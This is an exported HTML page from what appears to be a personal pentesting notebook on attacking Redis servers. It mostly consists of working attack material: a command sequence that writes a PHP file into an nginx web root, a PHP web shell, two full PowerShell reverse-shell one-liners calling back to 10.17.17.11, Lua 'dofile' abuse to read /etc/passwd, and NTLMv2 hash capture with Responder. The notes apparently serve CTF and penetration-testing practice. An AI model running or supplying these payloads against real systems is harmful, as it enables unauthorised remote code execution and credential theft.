<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Redis</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Redis</h1>

      <div class="ck-content">
        <p>default port is 6379, use <code>redis-cli -h &lt;IP&gt;</code> to remote
          access and use <code>info</code> to get database info.</p>
        <p>Some interesting commands are <code>client list</code> and <code>CONFIG GET *</code> .</p>
        <p>Inside Redis the <strong>databases are numbers starting from 0</strong>.
          You can find if anyone is used in the output of the command <code>info</code> inside
          the "Keyspace" chunk:</p>
        <figure class="image">
          <img src="Redis/image.png" />
        </figure>
        <p><strong>Dump the database with npm </strong><a href="https://www.npmjs.com/package/redis-dump"><strong>https://www.npmjs.com/package/redis-dump</strong></a><strong> </strong>

        </p>
        <p><code><strong>root@Urahara:~# redis-cli -h 10.85.0.52</strong></code>

          <br
          /><code><strong>10.85.0.52:6379&gt; config set dir /usr/share/nginx/html</strong></code>

          <br
          /><code><strong>OK</strong></code>

          <br /><code><strong>10.85.0.52:6379&gt; config set dbfilename redis.php</strong></code>

          <br
          /><code><strong>OK</strong></code>

          <br /><code><strong>10.85.0.52:6379&gt; set test "&lt;?php phpinfo(); ?&gt;"</strong></code>

          <br
          /><code><strong>OK</strong></code>

          <br /><code><strong>10.85.0.52:6379&gt; save</strong></code>

          <br /><code><strong>OK</strong></code>

        </p><pre><code class="language-text-plain">&lt;?php echo system($_GET['cmd']); ?&gt;</code></pre>

        <p><a href="https://book.hacktricks.xyz/pentesting/6379-pentesting-redis">https://book.hacktricks.xyz/pentesting/6379-pentesting-redis</a> </p><pre><code class="language-text-plain">set x "\r\n\r\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.17.17.11",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "&gt; ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\r\n\r\n"</code></pre>

        <p><a href="https://github.com/ChrisPritchard/ctf-writeups/blob/master/tryhackme/vulnnetactive.md">https://github.com/ChrisPritchard/ctf-writeups/blob/master/tryhackme/vulnnetactive.md</a> </p>
        <p>The Redis instance was running version 2.8, and did not require authentication.
          However, this version of Redis contains a 'vulnerability' where you can
          use <code>'dofile'</code> in the LUA sandbox, allowing you to access files
          or network shares. E.g. 
          <br /><code>EVAL "dofile('/etc/passwd')" 0</code> would work on a linux machine.
          <br
          />For a windows machine, notably, this can be used to access network shares.
          Which means, if I set up responder, I might be able to catch a hash.</p>
        <p>Setting up responder from this repo <a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a> ,
          then using something like <code>EVAL "dofile('//10.17.17.11//share')" 0</code> will
          catch an NTMLv2 hash.
          <br /> </p><pre><code class="language-text-plain">$client = New-Object System.Net.Sockets.TCPClient('10.17.17.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</code></pre>

        <p> </p>
      </div>
    </div>
  </body>

</html>